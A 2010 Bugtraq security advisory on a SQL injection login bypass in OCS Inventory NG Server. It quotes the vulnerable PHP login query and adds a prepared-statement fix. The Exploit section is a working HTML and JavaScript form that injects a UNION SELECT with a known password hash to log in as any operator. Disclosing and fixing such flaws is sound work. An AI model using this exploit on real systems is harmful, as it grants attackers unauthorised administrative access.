Date: Fri, 29 Jan 2010 10:08:52 +0100
From: Nicolas DEROUET <nicolas.derouet@...il.com>
To: bugtraq@...urityfocus.com
Subject: OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass

OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass


Software      : Open Computer and Software (OCS) Inventory NG
Download      : http://www.ocsinventory-ng.org/
Discovered by : Nicolas DEROUET (nicolas.derouet[gmail]com)
Version       : 1.03-beta3 and prior
Impact        : Critical
Remote        : Yes (No authentication is needed)


== Description ==

Open Computer and Software (OCS) Inventory Next Generation (NG) is an
application designed to help a network or system administrator keep track
of the computers configuration and software that are installed on the network.

The vulnerability is an SQL injection in the header.php file. The login
value submitted in the POST request is concatenated directly into the
SELECT statement. An attacker can pass a crafted SQL string that can be
used to create or modify information stored in the database, or to
authenticate as any user.

script : header.php (lines 102-111)

if(isset($_POST["login"])) {
  // $_POST["login"] is concatenated into the SQL text without escaping
  $req="SELECT id, accesslvl, passwd FROM operators WHERE id='".$_POST["login"]."'";
  $res=mysql_query($req,$_SESSION["readServer"]) or die(mysql_error());

  if($row=@mysql_fetch_object($res))
  {
    // DL 25/08/2005
    // Support new MD5 encrypted password or old clear password for login only
    if (($row->passwd != md5( $_POST["pass"])) and
        ($row->passwd != $_POST["pass"])) {
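
As an added illustration of the fix (this is example code, not OCS Inventory
NG's own code), the same login check written with a mysqli prepared
statement. The login value is bound as a parameter instead of being spliced
into the SQL text, so a UNION clause in the submitted login is compared
literally against the id column and can no longer change which row, or which
passwd value, the query returns. The example assumes a mysqli handle $db (the
original used the legacy mysql_* extension, which was removed in PHP 7.0),
assumes the operators.passwd column holds password_hash() output instead of
MD5 or cleartext, and uses placeholder connection credentials and a
placeholder $_SESSION["operator"] key.

```php
<?php
// Added example, not OCS Inventory NG code: hardened replacement for the
// header.php login check. Assumes mysqli (with mysqlnd, for get_result) and
// an operators.passwd column migrated to password_hash() output.

function check_login(mysqli $db, string $login, string $pass): ?array
{
    // The login value is a bound parameter, never part of the SQL text, so
    // input such as  0' UNION SELECT ...  is matched as a literal id value.
    $stmt = $db->prepare(
        'SELECT id, accesslvl, passwd FROM operators WHERE id = ?'
    );
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('s', $login);
    $stmt->execute();
    $result = $stmt->get_result();
    $row = ($result === false) ? null : $result->fetch_assoc();
    $stmt->close();

    if ($row === null) {
        return null;
    }

    // password_verify() checks a salted hash; the unsalted MD5 and cleartext
    // fallbacks of the original comparison are intentionally dropped.
    if (!password_verify($pass, $row['passwd'])) {
        return null;
    }

    return ['id' => $row['id'], 'accesslvl' => $row['accesslvl']];
}

if (isset($_POST['login'], $_POST['pass'])) {
    // Placeholder credentials; a real deployment reads these from config.
    $db = new mysqli('localhost', 'ocs_user', 'CHANGE-ME', 'ocsweb');
    $operator = check_login($db, (string)$_POST['login'], (string)$_POST['pass']);
    if ($operator === null) {
        // One generic message whether the operator or the password was wrong.
        die('Login failed');
    }
    $_SESSION['operator'] = $operator; // placeholder session key (assumed)
}
```

Two points carry the fix: the parameter binding closes the injection
regardless of what the input contains, and password_verify() removes the
"old clear password" comparison branch, which otherwise lets a row whose
passwd column the attacker controls match a chosen password.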

== Exploit ==

<script>
  function inject()
  {
    document.getElementById('log').action = document.getElementById('ocsreports').value + 'index.php';
    var sql = "0' UNION SELECT id, accesslvl, 'a181b4673216ad247a0f78066a9646e1' FROM operators WHERE id='";
    document.getElementById('login').value = sql + document.getElementById('user').value;
    document.getElementById('pass').value = "inject";
  }
</script>
<form name="log" id="log" action="" method="post">
  <table border="0" width="450px">
  <tr>
    <td><b>OCSReports :</b></td>
    <td><input type="text" id="ocsreports" size="40" value="http://127.0.0.1/ocsreports/" /></td>
  </tr>
  <tr>
    <td><b>Login :</b></td>
    <td><input type="text" id="user" size="40" value="admin" /></td>
  </tr>
  <tr>
    <td><input type="hidden" name="login" id="login" />
        <input type="hidden" name="pass"  id="pass"  /></td>
    <td><input type="submit" name="subLogin" onclick="inject();"></td>
  </tr>
  </table>
</form>
